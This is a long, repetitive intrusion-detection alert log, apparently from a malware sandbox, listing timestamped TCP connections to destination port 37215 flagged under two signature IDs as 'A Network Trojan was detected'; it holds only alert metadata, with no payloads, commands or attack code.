            Timestamp:05/28/24-09:57:33.072902
            SID:2829579
            Source Port:46684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900537
            SID:2829579
            Source Port:35106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542826
            SID:2829579
            Source Port:53426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725316
            SID:2829579
            Source Port:41184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866414
            SID:2835222
            Source Port:58382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441415
            SID:2829579
            Source Port:57600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932662
            SID:2835222
            Source Port:36610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941618
            SID:2835222
            Source Port:56454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047418
            SID:2829579
            Source Port:32772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989607
            SID:2829579
            Source Port:46932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432629
            SID:2829579
            Source Port:33536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953144
            SID:2835222
            Source Port:55644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333247
            SID:2835222
            Source Port:37440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557308
            SID:2829579
            Source Port:47820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782625
            SID:2829579
            Source Port:48334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010484
            SID:2835222
            Source Port:47532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764695
            SID:2829579
            Source Port:44272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932764
            SID:2835222
            Source Port:50202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543983
            SID:2829579
            Source Port:37058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392474
            SID:2829579
            Source Port:58138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853328
            SID:2829579
            Source Port:43516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918239
            SID:2829579
            Source Port:53906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506839
            SID:2829579
            Source Port:50744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904457
            SID:2835222
            Source Port:33756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849661
            SID:2835222
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926850
            SID:2835222
            Source Port:59566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261811
            SID:2835222
            Source Port:36858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862126
            SID:2835222
            Source Port:53266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743980
            SID:2829579
            Source Port:36542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437348
            SID:2829579
            Source Port:55376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811958
            SID:2829579
            Source Port:49426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263092
            SID:2829579
            Source Port:36720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445070
            SID:2829579
            Source Port:41470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808029
            SID:2829579
            Source Port:33954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412963
            SID:2829579
            Source Port:46842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507323
            SID:2829579
            Source Port:39686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597602
            SID:2829579
            Source Port:45036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843538
            SID:2829579
            Source Port:46680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864367
            SID:2829579
            Source Port:49518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933436
            SID:2829579
            Source Port:48562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515854
            SID:2835222
            Source Port:32982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986240
            SID:2835222
            Source Port:48740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433503
            SID:2835222
            Source Port:38386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665904
            SID:2829579
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.899731
            SID:2829579
            Source Port:36838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704440
            SID:2829579
            Source Port:59360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441454
            SID:2835222
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510386
            SID:2835222
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510439
            SID:2835222
            Source Port:39506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742982
            SID:2835222
            Source Port:56118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057307
            SID:2835222
            Source Port:57548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.781875
            SID:2835222
            Source Port:39128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910777
            SID:2829579
            Source Port:46164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872718
            SID:2835222
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944885
            SID:2835222
            Source Port:60342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290711
            SID:2835222
            Source Port:41952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423397
            SID:2829579
            Source Port:38862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488953
            SID:2829579
            Source Port:53486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811954
            SID:2835222
            Source Port:53376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760306
            SID:2835222
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806791
            SID:2829579
            Source Port:38168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846973
            SID:2835222
            Source Port:39422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.010725
            SID:2829579
            Source Port:59734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.676652
            SID:2835222
            Source Port:58842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906405
            SID:2829579
            Source Port:32848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861177
            SID:2835222
            Source Port:55530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034937
            SID:2829579
            Source Port:48932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873474
            SID:2835222
            Source Port:52560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777144
            SID:2835222
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053264
            SID:2829579
            Source Port:41974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879566
            SID:2829579
            Source Port:47262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896041
            SID:2829579
            Source Port:41118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597040
            SID:2835222
            Source Port:40842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846591
            SID:2829579
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754618
            SID:2835222
            Source Port:36322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776650
            SID:2835222
            Source Port:48600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063381
            SID:2829579
            Source Port:45478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995397
            SID:2829579
            Source Port:57728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934979
            SID:2829579
            Source Port:59752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556825
            SID:2829579
            Source Port:49210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525963
            SID:2835222
            Source Port:59150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893746
            SID:2835222
            Source Port:46330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.019944
            SID:2829579
            Source Port:37942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924849
            SID:2829579
            Source Port:59246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899873
            SID:2829579
            Source Port:43624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335418
            SID:2829579
            Source Port:44360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075109
            SID:2829579
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649140
            SID:2835222
            Source Port:44034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877387
            SID:2835222
            Source Port:51518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765712
            SID:2829579
            Source Port:39500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863613
            SID:2835222
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984458
            SID:2829579
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951398
            SID:2829579
            Source Port:39608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716731
            SID:2835222
            Source Port:54686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778472
            SID:2835222
            Source Port:51034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943787
            SID:2829579
            Source Port:37348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741478
            SID:2829579
            Source Port:47714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450993
            SID:2835222
            Source Port:40772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425954
            SID:2829579
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858560
            SID:2829579
            Source Port:52150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507145
            SID:2835222
            Source Port:36618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383579
            SID:2829579
            Source Port:59686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067101
            SID:2835222
            Source Port:34828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639853
            SID:2835222
            Source Port:57130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953689
            SID:2829579
            Source Port:48364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290337
            SID:2829579
            Source Port:35094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772839
            SID:2829579
            Source Port:57394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065846
            SID:2835222
            Source Port:36508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031044
            SID:2835222
            Source Port:47324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919107
            SID:2829579
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871726
            SID:2829579
            Source Port:32938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380200
            SID:2835222
            Source Port:55428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000110
            SID:2829579
            Source Port:39426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560220
            SID:2829579
            Source Port:49960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655690
            SID:2835222
            Source Port:55696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691661
            SID:2835222
            Source Port:41114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985444
            SID:2829579
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470269
            SID:2835222
            Source Port:53984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026438
            SID:2835222
            Source Port:41330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.817623
            SID:2835222
            Source Port:47742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869102
            SID:2829579
            Source Port:35710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919757
            SID:2835222
            Source Port:59102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075014
            SID:2835222
            Source Port:34760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412704
            SID:2835222
            Source Port:60444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605095
            SID:2835222
            Source Port:40278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067736
            SID:2829579
            Source Port:37402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772454
            SID:2829579
            Source Port:45944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663976
            SID:2835222
            Source Port:49368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500112
            SID:2835222
            Source Port:43544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543920
            SID:2835222
            Source Port:45750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954494
            SID:2835222
            Source Port:37996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931015
            SID:2835222
            Source Port:53022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751718
            SID:2829579
            Source Port:41458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072579
            SID:2829579
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586789
            SID:2835222
            Source Port:57796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059869
            SID:2829579
            Source Port:52728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681885
            SID:2829579
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932849
            SID:2829579
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756474
            SID:2835222
            Source Port:45302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.767432
            SID:2829579
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776211
            SID:2835222
            Source Port:50786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421603
            SID:2829579
            Source Port:45120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507505
            SID:2829579
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748583
            SID:2829579
            Source Port:36142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575355
            SID:2835222
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541125
            SID:2829579
            Source Port:47346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078434
            SID:2829579
            Source Port:44752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924379
            SID:2835222
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299835
            SID:2835222
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294552
            SID:2829579
            Source Port:33912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336049
            SID:2835222
            Source Port:57074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048138
            SID:2835222
            Source Port:36662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300264
            SID:2829579
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507765
            SID:2829579
            Source Port:42534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.650649
            SID:2829579
            Source Port:55752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.964428
            SID:2829579
            Source Port:50824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050898
            SID:2835222
            Source Port:46248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855005
            SID:2835222
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697493
            SID:2835222
            Source Port:45454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924140
            SID:2835222
            Source Port:42236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934962
            SID:2835222
            Source Port:35708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004903
            SID:2829579
            Source Port:46130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276981
            SID:2829579
            Source Port:52968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587373
            SID:2835222
            Source Port:38552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073186
            SID:2835222
            Source Port:40882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.812739
            SID:2835222
            Source Port:57066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517469
            SID:2835222
            Source Port:50480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061597
            SID:2835222
            Source Port:52844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704307
            SID:2835222
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815669
            SID:2835222
            Source Port:57050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915060
            SID:2829579
            Source Port:47942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.081925
            SID:2829579
            Source Port:46216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847011
            SID:2835222
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047830
            SID:2829579
            Source Port:45910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074900
            SID:2829579
            Source Port:45722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851119
            SID:2829579
            Source Port:57414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052538
            SID:2835222
            Source Port:55786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825634
            SID:2829579
            Source Port:53758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615015
            SID:2835222
            Source Port:53512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952917
            SID:2829579
            Source Port:60158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543186
            SID:2829579
            Source Port:55506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979428
            SID:2835222
            Source Port:37710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.617036
            SID:2829579
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469918
            SID:2829579
            Source Port:46338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733836
            SID:2829579
            Source Port:44388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853247
            SID:2829579
            Source Port:55804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053939
            SID:2835222
            Source Port:46430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745102
            SID:2829579
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767544
            SID:2829579
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733671
            SID:2835222
            Source Port:39348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015524
            SID:2835222
            Source Port:41980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231256
            SID:2829579
            Source Port:39144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.295672
            SID:2835222
            Source Port:37610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582721
            SID:2835222
            Source Port:46968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863817
            SID:2829579
            Source Port:36516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596409
            SID:2829579
            Source Port:41072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861779
            SID:2829579
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933875
